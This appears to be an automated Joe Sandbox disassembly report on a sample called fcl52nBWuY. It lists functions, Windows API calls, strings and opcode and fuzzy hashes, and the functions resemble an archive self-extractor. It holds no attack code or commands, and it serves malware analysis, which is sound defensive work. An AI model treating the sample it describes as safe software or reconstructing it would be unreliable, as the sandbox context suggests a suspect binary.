    • API String ID: 1269201914-0
    • Opcode ID: b28859258ee3585167883871a4ea8a19a2c085cdd0f2c83fa9dd2d6bb9afb83f
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: b28859258ee3585167883871a4ea8a19a2c085cdd0f2c83fa9dd2d6bb9afb83f
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 094f647e9d76e0b3425375f767c7bcd97817694ef77d27a928ce456b2e311b65
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: 094f647e9d76e0b3425375f767c7bcd97817694ef77d27a928ce456b2e311b65
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 59eb58aa7c6dcf9a676602838cb16ec0fa3e3b8ae9f2a8958f699656a0cfc773
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: 59eb58aa7c6dcf9a676602838cb16ec0fa3e3b8ae9f2a8958f699656a0cfc773
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 07942b4f0738be4cf903c28cc25c0029f05e8711a8eb30da837b363176b9678f
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: 07942b4f0738be4cf903c28cc25c0029f05e8711a8eb30da837b363176b9678f
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F546
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 686365520fce0adcb7e340f1f44e9ef9ea108c4c1183afbd5f18520bce8f727f
    • Instruction ID: fc2ffd12a8c8ed47e1d5ec5912e9a05968f40bc35657d933734ab0b26db29a87
    • Opcode Fuzzy Hash: 686365520fce0adcb7e340f1f44e9ef9ea108c4c1183afbd5f18520bce8f727f
    • Instruction Fuzzy Hash: B7A012C11A84037D310425503C02C3B011CC6C4BB2330883BF903C40816848080D1031
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c321acb29d9c506bd46ce3b8574a3f5b2fda1657535296f00a3e7ad5bfb0c5d8
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: c321acb29d9c506bd46ce3b8574a3f5b2fda1657535296f00a3e7ad5bfb0c5d8
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: ac11a6024c4aaacf01ac8dd41ed5d1bdbb2850e78820ec180768a25dfbbca504
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: ac11a6024c4aaacf01ac8dd41ed5d1bdbb2850e78820ec180768a25dfbbca504
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 4c5069efbd12e489a72dbe3399eadedc3761413c89c16e17f112ff0c41d6e155
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: 4c5069efbd12e489a72dbe3399eadedc3761413c89c16e17f112ff0c41d6e155
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6dc8b2f08bbd8cabba2208e80afb58caf45452d981f334328dd01f5b41ac774a
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: 6dc8b2f08bbd8cabba2208e80afb58caf45452d981f334328dd01f5b41ac774a
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0005F69B
      • Part of subcall function 0005F9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005FA4C
      • Part of subcall function 0005F9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005FA5D
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0760c3aa74cdbe9e888d849e1eaaeaf3a3ef5f37bd82293024a820220debdc3c
    • Instruction ID: 6b4d8e959fb6d39c51270b71bc8073b7ccb76a8d318e036653e853e17f87cb98
    • Opcode Fuzzy Hash: 0760c3aa74cdbe9e888d849e1eaaeaf3a3ef5f37bd82293024a820220debdc3c
    • Instruction Fuzzy Hash: 97A001966B9503BC325862616E17D7B022ECAD8F66330893BF907D84D2A898184925B6
    APIs
    • CloseHandle.KERNEL32(000000FF,?,?,0004A83D,?,?,?,?,?,000737FF,000000FF), ref: 0004A89B
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: a43142930138965c35b576fe4567fd011ec2347cf611772d46d6323b547bddb7
    • Instruction ID: 96775faef5823051542b04e9910c184fc599af247e037aafb7f1d73854a6eeae
    • Opcode Fuzzy Hash: a43142930138965c35b576fe4567fd011ec2347cf611772d46d6323b547bddb7
    • Instruction Fuzzy Hash: AAF0E2B05C2B058FEB308B24C448792B3E4EB13335F041B6EC0E6438E0D774698E8B56
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0005D4A1
    • EndDialog.USER32(?,00000006), ref: 0005D4B4
    • GetDlgItem.USER32(?,0000006C), ref: 0005D4D0
    • SetFocus.USER32(00000000), ref: 0005D4D7
    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0005D511
    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0005D548
    • FindFirstFileW.KERNEL32(?,?), ref: 0005D55E
      • Part of subcall function 0005BC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC2F
      • Part of subcall function 0005BC1B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0005BC40
      • Part of subcall function 0005BC1B: SystemTimeToFileTime.KERNEL32(?,?), ref: 0005BC4E
      • Part of subcall function 0005BC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 0005BC5C
      • Part of subcall function 0005BC1B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0005BC77
      • Part of subcall function 0005BC1B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0005BC9E
      • Part of subcall function 0005BC1B: _swprintf.LIBCMT ref: 0005BCC4
    • _swprintf.LIBCMT ref: 0005D5A7
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0005D5BA
    • FindClose.KERNEL32(00000000), ref: 0005D5C1
    • _swprintf.LIBCMT ref: 0005D610
    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0005D623
    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0005D640
    • _swprintf.LIBCMT ref: 0005D673
    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0005D686
    • _swprintf.LIBCMT ref: 0005D6D0
    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0005D6E3
      • Part of subcall function 0005C083: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0005C0A9
      • Part of subcall function 0005C083: GetNumberFormatW.KERNEL32(00000400,00000000,?,0008072C,?,?), ref: 0005C0F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberParentSpecificWindow__vswprintf_c_l
    • String ID: %s %s$REPLACEFILEDLG
    • API String ID: 2415798972-439456425
    • Opcode ID: c4b9fdcc031844f4db50f86493b86a308f11dd1be0f1e48407159bbb4cadc571
    • Instruction ID: e8b3d9efa5fb27996e571d60049e8e3c0f11d9556f7b081c3bcba20805ce50fe
    • Opcode Fuzzy Hash: c4b9fdcc031844f4db50f86493b86a308f11dd1be0f1e48407159bbb4cadc571
    • Instruction Fuzzy Hash: F071BA72548704BBE7319B64DC49FFF77ECEB8A702F04041AFA49D2091D675A9098B63
    APIs
    • __EH_prolog.LIBCMT ref: 00047AB4
    • _wcslen.LIBCMT ref: 00047B1D
    • _wcslen.LIBCMT ref: 00047B8E
      • Part of subcall function 00048704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00048713
      • Part of subcall function 00048704: GetLastError.KERNEL32 ref: 00048759
      • Part of subcall function 00048704: CloseHandle.KERNEL32(?), ref: 00048768
      • Part of subcall function 0004B470: DeleteFileW.KERNEL32(?,00000000,?,0004A438,?,?,?,?,0004892B,?,?,?,000737FF,000000FF), ref: 0004B481
      • Part of subcall function 0004B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,0004A438,?,?,?,?,0004892B,?,?,?,000737FF,000000FF), ref: 0004B4AF
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00047C43
    • CloseHandle.KERNEL32(00000000), ref: 00047C5F
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00047DAB
      • Part of subcall function 0004B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00047ED0,?,?,?,00000000), ref: 0004B04C
      • Part of subcall function 0004B032: SetFileTime.KERNEL32(?,?,?,?), ref: 0004B100
      • Part of subcall function 0004A880: CloseHandle.KERNEL32(000000FF,?,?,0004A83D,?,?,?,?,?,000737FF,000000FF), ref: 0004A89B
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B8FA
      • Part of subcall function 0004B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B5B5,?,?,?,0004B405,?,00000001,00000000,?,?), ref: 0004B92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
    • API String ID: 3983180755-3508440684
    • Opcode ID: 4fb9e66ad0c939f0afd1a0182ccacd9d18190a5b49e7577f82953fa217cdec1d
    • Instruction ID: 8900215949d9cd98a5cc24ef2a4725ee7c5eaa80723358b530202bd3fbd8985f
    • Opcode Fuzzy Hash: 4fb9e66ad0c939f0afd1a0182ccacd9d18190a5b49e7577f82953fa217cdec1d
    • Instruction Fuzzy Hash: F2C1A5B1904249AAEB21DB64CC85FEEB7ACBF04314F00457AF54DE7182DB74EA44CBA5
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: __floor_pentium4
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 4168288129-2761157908
    • Opcode ID: 58bbd1586095efa5ceea3644fc11b205457a863ecb9cf7a540bb1d77316053bc
    • Instruction ID: 6c46c1fa027c75d4f25d50ea37183898364a9f2737f441317b7718a005cab3bd
    • Opcode Fuzzy Hash: 58bbd1586095efa5ceea3644fc11b205457a863ecb9cf7a540bb1d77316053bc
    • Instruction Fuzzy Hash: 2BC22871E086298FDB65CE28ED407EAB7F6EB44314F1441EAD84DE7241E779AE818F40
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: H_prolog_swprintf
    • String ID: CMT$h%u$hc%u
    • API String ID: 146138363-3282847064
    • Opcode ID: 813b2c5a7d17cbdf01e274992d7d79f53968e76166f710b2f0ec1530150f48de
    • Instruction ID: 177e568a52ca73d4daf3d97b910110e9367d469f6e31538f917775435642bc47
    • Opcode Fuzzy Hash: 813b2c5a7d17cbdf01e274992d7d79f53968e76166f710b2f0ec1530150f48de
    • Instruction Fuzzy Hash: 0542E3B16002849BDF24DF34C885BEA3BE5AF15300F444479FD4A9B283DB74AA89CB65
    APIs
    • __EH_prolog.LIBCMT ref: 00042EBF
    • _strlen.LIBCMT ref: 0004348B
      • Part of subcall function 000515F9: __EH_prolog.LIBCMT ref: 000515FE
      • Part of subcall function 00052EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0004CF18,00000000,?,?), ref: 00052EDE
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 000435DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
